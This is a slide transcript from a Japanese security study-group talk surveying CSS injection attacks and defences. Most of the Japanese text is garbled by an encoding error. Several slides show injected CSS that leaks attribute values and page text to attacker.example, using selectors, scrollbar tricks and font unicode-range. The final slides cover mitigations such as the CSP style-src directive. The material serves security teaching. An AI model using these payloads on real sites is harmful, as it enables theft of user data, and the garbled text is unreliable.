Upgrade to Pro — share decks privately, control downloads, hide ads and more …

CSS Injection ++ - 既存手法の概観と対策

CSS Injection ++ - 既存手法の概観と対策

「第19回ゼロから始めるセキュリティ入門 勉強会」での, CSS Injection の脅威と対策に関する short talk 用に作成した資料です :-)
勉強会ページ: https://weeyble-security.connpass.com/event/98127/

I explain some techniques of CSS Injection by @masatokinugawa, @SecurityMB, and other websec researchers in Japanese. I highly recommend to check the following awesome work by @SecurityMB and @0x6D6172696F.
- https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/
- https://www.slideshare.net/x00mario/stealing-the-pie

Takashi Yoneuchi

August 27, 2018
Tweet

More Decks by Takashi Yoneuchi

Other Decks in Technology

Transcript

  1. Takashi Yoneuchi 

    ja: @lmt_swallow , en: @y0n3uchy
    https://shift-js.info
    "File:CSS3 logo and wordmark.svg." Wikimedia Commons, the free media repository. 28 Feb 2018, 03:50 UTC. 25 Aug 2018, 05:09 title=File:CSS3_logo_and_wordmark.svg&oldid=289484916>.
    CSS Injection ++

    طଘख๏ͷ֓؍ͱରࡦ

    View full-size slide

  2. © 2018 shift-js.info All Rights Reserved.
    @lmt_swallow
    ‣ 5BLBTIJ:POFVDIJ

    BLB!ZOVDIZ
    ‣ EPEPEPEP $5'5FBN

    J 54(
    ‣ 4&$$0/#FHJOOFST
    DUGC
    TFDDBNQTUB⒎
    ‣ 8FC4FDVSJUZ3FTFBSDIFS
    8BOOBCF
    ‣ IUUQTTIJGUKTJOGP



    View full-size slide

  3. CSS Injection ͱ͸

    View full-size slide

  4. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    CSS Injection

    ੬ऑੑͷ֓ཁ
    ‣ "CSS injection vulnerabilities arise when an
    application imports a style sheet from a user-
    supplied URL, or embeds user input in CSS blocks
    without adequate escaping. "

    (PortSwigger, https://portswigger.net/kb/issues/00501300_css-injection-reflected)

    ‣ ߈ܸऀ͕೚ҙ CSS ϑΝΠϧͷΠϯϙʔτΛͤͨ͞Γ,
    ΛΤεέʔϓແ͠ͰૠೖͰ͖Δ੬ऑੑ<br/>4<br/>

    View full-size slide

  5. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Threats

    CSS Injection ͷڴҖ
    ‣ ʮͨͩ CSS ͕ૠೖͰ͖Δ͚ͩ͡Όͳ͍ͷ? ʯ
    ‣ ౴͑͸NO: े෼߈ܸͱͯ͠੒ཱ͢Δɻ
    ‣ CSS Injection ͷڴҖ͸࣍ͷΑ͏ʹ෼ྨͰ͖Δ:
    ‣ CSS ʹΑΔϖʔδίϯςϯπͷநग़
    ‣ ଐੑ (attribute) நग़
    ‣ λά಺ίϯςϯπநग़
    ‣ (CSS ͔Βͷ JavaScript ࣮ߦ (outdate))
    5

    View full-size slide

  6. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Even if it seems "invisible" ...?

    ݟ͑ͳ͍Α͏ʹݟ͑ͯ΋, ࣮͸…
    ‣ ࣮͸ λά౳͢Β style Λௐ੔Մೳ<br/>‣ CSS Injection ͷର৅ʹͳΔ<br/>6<br/><head><br/><style><br/>script { display: block; }<br/></style><br/></head><br/><body><br/><script> var secret = "hello";

    View full-size slide

  7. طଘख๏ͷ֓؍

    View full-size slide

  8. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    JS Execution from CSS

    CSS ͔Βͷ JS ࣮ߦ
    ‣ ੲ͸͍͔ͭ͘ͷํ๏Ͱ JS (or ద౰ͳεΫϦ
    ϓτݴޠ) ࣮ߦʹͭͳ͛Δٕ๏͕ଘࡏͨ͠ɻ
    ‣ .htc ϑΝΠϧͱ behavior: Λ࢖͏ྫ
    ‣ expression: Λ࢖͏ྫ
    ‣ Ϟμϯͳϒϥ΢βͰ͸ (஌ΔݶΓ) ࣮ݱෆՄ
    ೳͰ͋Δɻ
    8

    View full-size slide

  9. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Values of Attributes

    ଐੑ஋ΛϦʔΫ͢Δ: ݪཧ
    ‣ ࣍ͷΑ͏ͳ HTML λάΛߟ͑Α͏:


    ‣ ͜Ε͸࣍ͷ 3 ͭͷ CSS ηϨΫλશͯʹ
    Ϛον͢Δ:

    input[value ^= "a"] { /* ... */ }

    input[value ^= "ab"] { /* ... */ }

    input[value ^= "abc"] { /* ... */ }

    ‣ ͜ΕΛԠ༻͢Δͱ, ଐੑ஋Λ leak Մೳɻ
    9

    View full-size slide

  10. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Values of Attributes

    ଐੑ஋ΛϦʔΫ͢Δ: શମਤ
    10
    input[value ^= "a"] {

    background: url(http://attacker.example/?a)

    } /* ... */


    ߈ܸϕΫλ
    ϦΫΤετ
    ϦʔΫ
    ൓ࣹܕ
    ஝ੵܕ

    View full-size slide

  11. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Values of Attributes

    ଐੑ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (1)
    ‣ ࣍ͷλάͷ value Λൈ͖͍ͨͱ͢Δ:


    ‣ ࣍ͷΑ͏ͳ CSS Λ a-z ͷશͯ෼࡞ͬͯ Inject ͢Δ:



    aaa
    ‣ attacker.example Ͱ଴ͪड͚͍ͯΕ͹ GET /?a ͔Β
    GET /?z ͷͲΕ͕ඈΜͰ͘Δɻ( ۩ମతʹ͸ GET /?a )
    ‣ 1 จࣈ໨ ("a") ͷ leak ୡ੒
    11
    input[value ^= "a"] { 

    background: url(http://attacker.example/?a)

    }

    View full-size slide

  12. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Values of Attributes

    ଐੑ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (2)
    ‣ ࣍ʹ, ্هͷΑ͏ͳ CSS Λ४උ͢Δ:
    ‣ ಉ༷ʹ Inject ͯ͠ attacker.example Ͱ଴ͪड͚͍ͯ
    Ε͹, 2 จࣈ໨ ("b") ΋ leak Ͱ͖ΔɻҎ߱܁Γฦ͠ɻ
    12
    input[value ^= "aa"] { 

    background: url(http://attacker.example/?aa)

    }

    /* ... */

    input[value ^= "az"] {

    background: url(http://attacker.example/?az)

    }

    View full-size slide

  13. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Inner Values of Tags

    λά಺෦ͷ஋ΛϦʔΫ͢Δ: ֓؍
    ‣ ઌड़ͷํ๏Ͱ͸ CSS ηϨΫλͷ࢖͑Δ

    "ଐੑ஋" ͔͠ leak Ͱ͖ͳ͍ (҆શ!) ɻ
    ‣ ͔͠͠λά಺෦ͷ஋ͷ leak ΋, ผͷํ๏
    Ͱ࣮ݱՄೳɻ͜Ε͸͕࣍ΩϞ:
    ‣ "Ligature" ͷ੍ޚ
    ‣ ͦͷεΫϩʔϧόʔ੍ޚʹΑΔݕ஌
    ‣ @SecurityMB ͞Μͷهࣄ͕෼͔Γ΍͍͢

    https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-
    wykorzystac-css-y-do-atakow-na-webaplikacje/
    13

    View full-size slide

  14. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Inner Values of Tags

    λά಺෦ͷ஋ΛϦʔΫ͢Δ: શମਤ
    14


    ߈ܸϕΫλ
    ϦΫΤετ
    ϦʔΫ
    ൓ࣹܕ
    ஝ੵܕ

    View full-size slide

  15. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Inner Values of Tags

    λά಺෦ͷ஋ΛϦʔΫ͢Δ: શମਤ
    15
    ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ
    ߈ܸϕΫλ = +
    ‣ ϑΥϯτ੍ޚ
    ‣ ಛఆ৚݅ԼͰͷΈεΫϩʔϧόʔ͕ੜ͡ΔΑ͏ʹௐ੔͢Δ
    ‣ εΫϩʔϧόʔ੍ޚ
    ‣ εΫϩʔϧόʔ͕ੜͨ͡ͱ͖ͷΈ, ଴ͪड͚αʔόʔʹϦΫ
    ΤετΛඈ͹ͤ͞Δ

    View full-size slide

  16. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Inner Values of Tags

    λά಺෦ͷ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (1)
    16
    ϑΥϯτ੍ޚ
    f + i → fi (Times)
    ‣ ্هͷΑ͏ͳ Ligature (߹ࣈ) ͸ϑΥϯτͰఆٛՄೳͰ͋Δɻ
    ‣ ͦ͜Ͱ, ࣍ͷΑ͏ͳϑΥϯτΛ༻ҙ͠, σʔλΛϦʔΫ͍ͨ͠
    λάʹରͯ͠ઃఆ͢Δ:
    ‣ ಛఆͷจࣈͷฒͼ (e.g. abc) ʹରͯ͠͸, ϑΥϯτͷԣ෯Λ
    े෼େ͖͘औΔ
    ‣ ͦΕҎ֎͸ϑΥϯτͷԣ෯Λ 0 ʹ͢Δ

    View full-size slide

  17. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Inner Values of Tags

    λά಺෦ͷ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (2)
    17
    εΫϩʔϧόʔ੍ޚ
    ‣ ॳΊʹจࣈͷճΓࠐΈΛ௵͓ͯ͘͠: white-space: nowrap;
    ‣ ϑΥϯτ੍ޚʹΑΓ, ಛఆจࣈྻؚ͕·Ε͍ͯΔ৔߹ʹͷΈ,
    εΫϩʔϧόʔ͕ੜ͡Δɻ
    ‣ ͋ͱ͸࣍ͷΑ͏ͳ CSS ΋ซͤͯ Inject ͓ͯ͘͠ͱ, εΫϩʔϧ
    όʔදࣔΛ͖͔͚ͬʹ, ଴ͪड͚αʔόʔͱ௨৴͕Ͱ͖Δɻ
    body::-webkit-scrollbar:horizontal {
    background: url(http://attacker.example/leak);
    }

    View full-size slide

  18. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Steal Inner Values of Tags

    λά಺෦ͷ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (3)
    18
    ‣ ྫ͑͹ Hello, abc ͷ abc Λ leak ͍ͨ࣌͠
    ‣ "Hello, a" ͷΈ ligature ͱͯ͠ԣ෯͸େ͖͘, ͦΕҎ֎ͷ೚
    ҙจࣈ͸ԣ෯ 0 Ͱ͋ΔΑ͏ͳϑΥϯτΛ༻ҙ͢Δ
    ‣ ༻ҙͨ͠ϑΥϯτͷઃఆͱ, εΫϩʔϧόʔ੍ޚΛߦ͏ CSS
    Λ, ֤ϑΥϯτ͝ͱʹ Inject ͢Δɻ(→ ͲΕ͔ͰൃՐ͢Δ)
    ‣ 1 จࣈ໨ (= a ) ͕ leak Ͱ͖ͨΒ, ্هΛ܁Γฦ͢
    ‣ "Hello, ab", ... "Hello, az" ͳͲΛ४උ͢Δ, ͱ͍͏͜ͱ
    ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ
    +

    View full-size slide

  19. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Leak Candidates of Inner Values

    λά಺෦ͷจࣈछΛߜΔ/ͦͷॱংΛ஌Δ
    ‣ @font-face ͷࢦఆͰ, λά಺෦ͷจࣈछ͸ߜΕΔɻ
    ‣ unicode-range Λ࢖ͬͯ, ֤ Unicode ίʔυϙΠ
    ϯτʹରͯ͠ผݸͷϑΥϯτιʔεΛࢦఆ͢Δɻ



    ‣ ߈ܸऀ͸ඈΜͰ͖ͨϦΫΤετΛ଴ͪड͚Δɻ
    ‣ Reference: "@font-faceͷunicode-rangeΛར༻ͯ͠CSS͚ͩͰςΩετΛಡΈग़͢"

    by @masatokinugawa, http://masatokinugawa.l0.cm/2015/10/css-based-attack-
    abusing-unicode-range.html
    19
    @font-face{ font-family:poc; unicode-range:U+0041;

    src: url(http://attacker.example/?A);}

    View full-size slide

  20. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Leak Candidates of Inner Values

    λά಺෦ͷจࣈछΛߜΔ/ͦͷॱংΛ஌Δ
    ‣ ઌड़ͷख๏Ͱ͋Δจࣈͷొ৔͸஌Δ͜ͱ͕ग़དྷΔ͕, ͦͷ࢖༻
    ճ਺ɾॱ൪͸෼͔Βͳ͍ → ෆ׬શͳ෮ݩɻ
    ‣ ॱ൪: CSS ͷ animation Λ૊Έ߹ΘͤΔ͜ͱͰ, จࣈͷॳొ
    ৔ॱΛอͪͭͭ, ϑΥϯτཁٻͷϦΫΤετΛඈ͹ͤ͞Δ͜
    ͱ͕Ͱ͖Δɻ
    ‣ "HarekazeCTF2018 Web250 : A custom css for the flag"

    by @KageShiron, http://blog.esora.xyz/HarekazeCTF2018-CSS#web250-jp 

    ‣ ճ਺: ͜ΕΛઌड़ͷख๏Λϕʔεʹ෮ݩ͢Δख๏͸ະ஌ (or
    ଘࡏ͠ͳ͍?) (஌͍ͬͯͨΒڭ͍͑ͯͩ͘͞!)
    20

    View full-size slide

  21. ๷ޚͷࢹ఺͔Β:

    ߈ܸܦ࿏ɾରࡦ

    View full-size slide

  22. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Where can be exploited?
    ߈ܸܦ࿏
    ‣ Relative Path Overwrite (RPO)
    ‣ Writeup: "RPO Gadgets"

    by @filedescriptor, https://blog.innerht.ml/rpo-gadgets/

    ‣ λάࣗମΛૠೖͰ͖Δ৔߹<br/>‣ ͜ͷ৔߹͸ͦ΋ͦ΋ <script> ΛૠೖͰ͖ͦ͏͕ͩ,<br/>blacklist ͷόΠύεʹ͸࢖͑Δ?<br/>‣ <style> λά಺ʹ೚ҙจࣈྻΛૠೖͰ͖Δ৔߹<br/>‣ ೚ҙ CSS ΛϢʔβʔ͕ઃఆͰ͖ΔՕॴ<br/>22<br/>

    View full-size slide

  23. © 2018 shift-js.info
    CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
    Mitigations

    ରࡦ
    ‣ ΫϥΠΞϯτଆରࡦ: Content-Security-Policy
    ‣ ࠓճ঺հͨ͠߈ܸख๏͸, શͯ CSP ͷ style-src
    σΟϨΫςΟϒʹΑΓ੍ݶՄೳͰ͋Δɻ
    ‣ αʔόʔଆରࡦ: ϢʔβʔʹΑΔ CSS ૠೖͷ੍ݶ
    ‣ CSS Injection ؚΊ, ೚ҙ CSS ΛૠೖͰ͖ΔՕॴ͸,
    े෼ηΩϡϦςΟ্ͷϦεΫ଍ΓಘΔɻ
    ‣ Relative Path Overwrite ͕Մೳͳ৔߹, CSS ஫ೖ͕
    Ͱ͖ͦ͏ʹͳ͍ͱ͜Ζʹ΋ةݥੑ͋Γ! ஫ҙɻ
    23

    View full-size slide

  24. Thank you for listening :-)
    Any Questions?
    Takashi Yoneuchi
    ja: @lmt_swallow, en: @y0n3uchy
    https://shift-js.info

    View full-size slide